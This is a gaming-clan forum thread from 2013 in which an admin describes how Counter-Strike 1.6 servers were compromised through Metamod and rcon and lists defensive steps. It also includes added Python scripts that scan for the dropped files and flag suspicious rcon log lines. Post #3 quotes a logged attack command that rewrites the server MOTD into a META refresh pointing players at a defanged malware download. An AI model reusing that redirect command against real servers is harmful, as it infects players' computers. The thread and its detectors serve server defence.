"Hacked by Sir"

#1
In the past weeks, hundreds and hundreds of websites around the world got defaced by some Arab teams... commanded by a guy named "SiR Abdou" (personally I think "defaced work" is so lame, that can't be called "HACKED").

Anyway... in the past days a group of kids has exploited/injected some CS 1.6 servers, and I think those kids, wanting some attention, are using "SiR" nicks to make everyone think the CS servers got hacked by the same Arab team...

I just think that was by Russians...


OK. I was looking into the BsK and AG VDS to find any kind of evidence to trace those intrusions. I found only a little evidence, because those kids disable server logs to protect their identity...

1- Since we can't update our Dproto servers, we are at risk of being attacked very easily, we have nothing against this.... BUT WE ARE GOING TO DO OUR BEST TO PROTECT ALL OUR TEAM.

2- The only thing I saw was a kind of Metamod inject/exploit.

This is what I saw:

A file named Client.jar is created/downloaded; this file is backdoored (I will decompile it in the next days), in this root: /gameroot/cstrike

[Image: troyan.png]

Then an exec file is created in /gameroot/cstrike/addons/metamod

[Image: execa.png]

Inside this exec.cfg file:

[Image: exec2.png]

A folder named "maps" is created in /gameroot/cstrike/addons/amxmodx/configs

Inside that folder are all those map configs:

[Image: maps.png]

Inside each map.cfg are all stupid edited cvars; as everyone knows, that maps folder is automatically read on each server restart, so the cvars keep loading after each map change.

[Image: configsd.png]


So, now everyone knows the rcon and nick passwords to enjoy all the "hacked servers".


There are a few things that I will do on the BsK servers to protect us:


1- motd.txt will be read-only
2- we are going to disable the pause/unpause plugin
3- added those Steam, nicks to the amxbanlist and also the servers' banlist
4- make the "maps" folder read-only
5- make the user.ini file read-only so those kids can't be added as admin
6- thinking of adding some rcon protect plugins (changing the name so those kids can't disable them)
7- "log off" and "mp_logfile 0" will always be ON


I decided to post this because I think this info can be read and used by other clans to protect their own VDS...

If anyone has any idea or suggestion about this, please let us know!
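A triage check for the artifacts and read-only mitigations listed in post #1, as an added example (not code from the original post or from the BsK admins). Paths are relative to the game root named in the post, `users.ini` is the AMX Mod X admin list, and the watch list of sensitive cvars is an assumption because the post's screenshots are not available.

```python
import re
import stat
from pathlib import Path

# Paths from the post, relative to the game root (the directory that holds cstrike/).
DROPPED = ["cstrike/Client.jar", "cstrike/addons/metamod/exec.cfg"]
MAPS_DIR = "cstrike/addons/amxmodx/configs/maps"
# Items the post wants read-only; users.ini is the AMX Mod X admin list.
LOCKED = ["cstrike/motd.txt", "cstrike/addons/amxmodx/configs/users.ini", MAPS_DIR]
# Assumed watch list: cvars a per-map config has no reason to set.
SENSITIVE = re.compile(r'^\s*"?(rcon_password|sv_password|hostname)"?\s', re.I)
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def scan_game_root(game_root):
    """Return sorted (kind, relative_path, detail) findings for one game root."""
    root = Path(game_root)
    findings = []
    for rel in DROPPED:
        if (root / rel).exists():
            findings.append(("dropped-file", rel, "file named in the post is present"))
    maps = root / MAPS_DIR
    if maps.is_dir():
        for cfg in sorted(maps.glob("*.cfg")):
            rel = cfg.relative_to(root).as_posix()
            text = cfg.read_text(errors="replace")
            for number, line in enumerate(text.splitlines(), 1):
                match = SENSITIVE.match(line)
                if match:  # report the cvar name only, never its value
                    detail = f"line {number}: {match.group(1).lower()}"
                    findings.append(("map-cfg-cvar", rel, detail))
    for rel in LOCKED:
        path = root / rel
        if path.exists():
            mode = stat.S_IMODE(path.stat().st_mode)
            if mode & WRITE_BITS:
                findings.append(("writable", rel, oct(mode)))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for finding in scan_game_root(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*finding, sep="\t")
```

Read-only bits only hold if the game server process runs as a different user than the one owning these files; a process that owns a file can set the write bit back.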

#2
Out of curiosity, do our servers have any type of anti-virus/malware/trojan software installed on them?

#3
(05-07-2013, 08:59 AM)N0616JC Wrote: Out of curiosity, do our servers have any type of anti-virus/malware/trojan software installed on them?

AV can't reject this kind of inject, because that's an "rcon" "cvar" on the servers to download external trojans between "external link -----> Player PC"...

Example: Rcon from 178.123.103.201:15518:rcon 1399145428
XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//downloadingvirustoplayer*com/cstrike*exe"

On a VDS we can't run any kind of AV, because this reduces resources and increases server lag....

So... our VDS is not remotely hacked or anything like that; we have some protection to avoid intrusions, like firewall and port filtering settings...


It's very important that everyone reports any server issue, to check and be sure we are safe...

MOTD (when you join a server, an image appears with server stuff and the bsoldiers weblink): when you see no image on the MOTD, please report it to us...

When you see a hostname different from [Bsoldiers.com] CLASSIC SERVER FASTDOWNLOAD blah blah, please report.

Also when your admin access doesn't work...

(Sorry for my English, if somebody can fix it, feel free)

Extra info about those xploits HERE
Thanks given by: Phaze-One , N0616JC
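Detection logic for the rcon pattern quoted in post #3, as an added example (not code from the thread): it parses lines in the layout of the sample shown there and also checks MOTD content directly, since post #1 notes that server logs were being disabled. The sample lines, addresses and the `example.invalid` URL are constructed, and the field layout is assumed from the single sample in the post.

```python
import re

# Layout taken from the sample in the post:
#   Rcon from <ip>:<port>:rcon <challenge> <password> <command...>
RCON_LINE = re.compile(
    r'Rcon from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+):'
    r'rcon (?P<challenge>-?\d+) (?P<password>"[^"]*"|\S+) (?P<command>.*)$')
META_REFRESH = re.compile(r'<\s*meta[^>]*http-equiv\s*=\s*["\']?refresh', re.I)

# Constructed sample lines (documentation addresses, placeholder password).
SAMPLE_LOG = [
    'Rcon from 192.0.2.10:27005:rcon 123456789 PLACEHOLDER motd_write '
    '<META HTTP-EQUIV=Refresh CONTENT="0 URL=http://example.invalid/file">',
    'Rcon from 198.51.100.7:27005:rcon 987654321 PLACEHOLDER status',
    'Server cvar "mp_timelimit" = "30"',
]


def motd_has_redirect(motd_text):
    """True when MOTD HTML sends the player's client to another URL."""
    return bool(META_REFRESH.search(motd_text))


def classify(line):
    """Return None for non-rcon lines, else a dict; the password is never kept."""
    m = RCON_LINE.search(line)
    if not m:
        return None
    command = m.group("command")
    verb = command.split(None, 1)[0].lower() if command.strip() else ""
    reasons = []
    if verb == "motd_write":
        reasons.append("rcon rewrote the MOTD")
    if motd_has_redirect(command):
        reasons.append("MOTD HTML contains a META refresh redirect")
    source = f'{m.group("ip")}:{m.group("port")}'
    return {"source": source, "verb": verb, "reasons": reasons}


def suspicious(lines):
    """Keep only the rcon lines that carry at least one reason."""
    parsed = (classify(line) for line in lines)
    return [hit for hit in parsed if hit and hit["reasons"]]


if __name__ == "__main__":
    for hit in suspicious(SAMPLE_LOG):
        print(hit["source"], hit["verb"], "; ".join(hit["reasons"]))
```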

#4
I am glad that our community is taking steps to prevent the same thing from happening to us. However, I think that our Dust2 24/7 server might be at a higher risk than other servers in our community, as the server's host-name was changed to a clan somewhere in Romania. I will pay closer attention to that server when I am entering any BsK owned servers. Also, I think this thread should get more "heat" so that our members would be safer and more aware of the situation. Also, I hope that this will pass without other incidents to our servers. In all, I hope that our prevention will hold.

#5
Wow, but I have only 1 question: how did you realize this problem?

#6
(05-07-2013, 09:11 PM)VeGa Wrote: Wow, but I have only 1 question: how did you realize this problem?

my mom has told me Blush

#7
hahaha and thanks besnik you help us many times Big Grin

#8
wooo this is some interesting stuff there.. nicee besnik.. pretty tight stuff Smile you always come up with all these brilliant ideas bro... keep it up.. 2 thumbs up Big Grin Big Grin

#9
(05-07-2013, 10:59 PM)H I G H Wrote: wooo this is some interesting stuff there.. nicee besnik.. pretty tight stuff Smile you always come up with all these brilliant ideas bro... keep it up.. 2 thumbs up Big Grin Big Grin

ty Sr.! btw, long time didn't see u!! good to know u are back!!!

#10
(05-07-2013, 11:02 PM)besnik_91 Wrote:
(05-07-2013, 10:59 PM)H I G H Wrote: wooo this is some interesting stuff there.. nicee besnik.. pretty tight stuff Smile you always come up with all these brilliant ideas bro... keep it up.. 2 thumbs up Big Grin Big Grin

ty Sr.! btw, long time didn't see u!! good to know u are back!!!

LOL, where have you been besnik, he has been back for a while now.